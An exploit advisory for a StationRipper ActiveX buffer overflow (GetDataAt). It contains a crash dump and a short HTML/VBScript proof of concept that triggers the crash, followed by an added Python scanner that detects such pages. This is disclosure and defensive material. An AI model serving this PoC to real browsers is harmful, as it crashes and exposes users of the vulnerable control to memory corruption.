stationripper ActiveX (RSLSPCOM.dll) Buffer Overflow PoC

2012.07.21
Credit: coolkaveh
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-119

Exploit Title: stationripper ActiveX (RSLSPCOM.dll) BoF PoC
Date: July 19, 2012
Author: coolkaveh coolkaveh () rocketmail com https://twitter.com/coolkaveh
Vendor Homepage: www.stationripper.com
Version: 2.98.3/1
Tested on: windows XP SP3
---------------------------------------------------------------------------------------
cheers to awesome hippie flaw hunter
---------------------------------------------------------------------------------------
Class SSLDataContainer
GUID: {E52990C2-7CED-4756-9B3B-6188A5B41704}

GetDataAt
Function GetDataAt ( ByVal lPos As Long , ByVal lHowMuch As Long ) As String
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
EIP 003B1191
EAX 00000000
EBX 003BB3BC -> 003B3904
ECX 003D2120 -> BAADF00D
EDX 00000000
EDI FFFFFFFF
ESI 00000000
EBP 0013EDA4 -> 0013EDCC
ESP 0013ED64 -> 003BB3BC

Block Disassembly:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
3B1181 MOV DL,AL
3B1183 AND DL,F
3B1186 SHL DL,2
3B1189 OR [EBP+13],DL
3B118C SHR AL,4
3B118F MOV DL,AL
3B1191 MOV AL,[EDI]   <--- CRASH
3B1193 MOV BL,AL
3B1195 AND BL,3
3B1198 SHL BL,4
3B119B OR DL,BL
3B119D SHR AL,2
3B11A0 MOV [EBP+F],AL
3B11A3 MOV EAX,[EBP-4]
3B11A6 SUB [EBP-8],EAX

ArgDump:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
EBP+8  003D2120 -> BAADF00D
EBP+12 FFFFFFFF
EBP+16 00000001
EBP+20 00000005
EBP+24 00000001
EBP+28 00000000

Exploit
<html>
<object classid='clsid:E52990C2-7CED-4756-9B3B-6188A5B41704' id='xpl' ></object>
<script language='vbscript'>
targetFile = "C:\Program Files\Ratajik Software\StationRipper\RSLSPCOM.dll"
prototype = "Function GetDataAt ( ByVal lPos As Long , ByVal lHowMuch As Long ) As String"
memberName = "GetDataAt"
progid = "SSLHIJACKCLIENTCOMLib.SSLDataContainer"
argCount = 2
arg1=-1
arg2=1
xpl.GetDataAt arg1 ,arg2
</script>
</html>
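As an added defender-side example (not part of the advisory above), a small Python scanner that flags HTML pages instantiating the SSLDataContainer CLSID from this advisory and calling GetDataAt with a negative lPos or lHowMuch, the condition the crash dump reflects (EDI = FFFFFFFF from lPos = -1). The regexes and the sample pages are my own construction, modelled on the shape of the PoC.

```python
import re
# CLSID of the SSLDataContainer control named in the advisory above.
SSLDATACONTAINER_CLSID = "E52990C2-7CED-4756-9B3B-6188A5B41704"

OBJECT_RE = re.compile(
    r"<object[^>]*classid\s*=\s*['\"]?clsid:\{?([0-9A-Fa-f-]{36})\}?['\"]?[^>]*>",
    re.IGNORECASE)
ID_RE = re.compile(r"\bid\s*=\s*['\"]?([A-Za-z_][\w-]*)", re.IGNORECASE)
# VBScript statement form used by the PoC:  <id>.GetDataAt <lPos>, <lHowMuch>
CALL_RE = re.compile(r"\b(\w+)\.GetDataAt\s+([^,\n]+),([^\n<]+)", re.IGNORECASE)
# Simple integer assignments (arg1=-1) so variable arguments can be resolved.
ASSIGN_RE = re.compile(r"^\s*(\w+)\s*=\s*(-?\d+)\s*$", re.MULTILINE)

def _resolve(token, assignments):
    token = token.strip()
    if re.fullmatch(r"-?\d+", token):
        return int(token)
    return assignments.get(token)   # None if the value is not a known literal

def scan_html(html):
    """Return a list of findings; an empty list means nothing suspicious."""
    findings, suspect_ids = [], set()
    for m in OBJECT_RE.finditer(html):
        if m.group(1).upper() == SSLDATACONTAINER_CLSID:
            idm = ID_RE.search(m.group(0))
            obj_id = idm.group(1) if idm else "<anonymous>"
            suspect_ids.add(obj_id)
            findings.append(f"object '{obj_id}' instantiates SSLDataContainer {m.group(1)}")
    assignments = {k: int(v) for k, v in ASSIGN_RE.findall(html)}
    for obj, a1, a2 in CALL_RE.findall(html):
        if obj not in suspect_ids:
            continue
        pos, howmuch = _resolve(a1, assignments), _resolve(a2, assignments)
        if pos is None or howmuch is None:
            findings.append(f"{obj}.GetDataAt called with non-literal arguments")
        elif pos < 0 or howmuch < 0:
            # lPos=-1 is exactly what the crash dump above shows in EDI (FFFFFFFF).
            findings.append(f"{obj}.GetDataAt called with out-of-range arguments ({pos}, {howmuch})")
    return findings

# Constructed sample pages (not captured traffic): the first mirrors the PoC's shape.
SAMPLE_PAGE = """<html>
<object classid='clsid:E52990C2-7CED-4756-9B3B-6188A5B41704' id='xpl' ></object>
<script language='vbscript'>
arg1=-1
arg2=1
xpl.GetDataAt arg1 ,arg2
</script></html>"""
BENIGN_PAGE = "<html><body><p>No ActiveX here.</p></body></html>"
```

The scanner only understands the literal-assignment VBScript form the PoC uses; calls with computed arguments are reported as non-literal so a human can review them.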

References:

https://twitter.com/coolkaveh

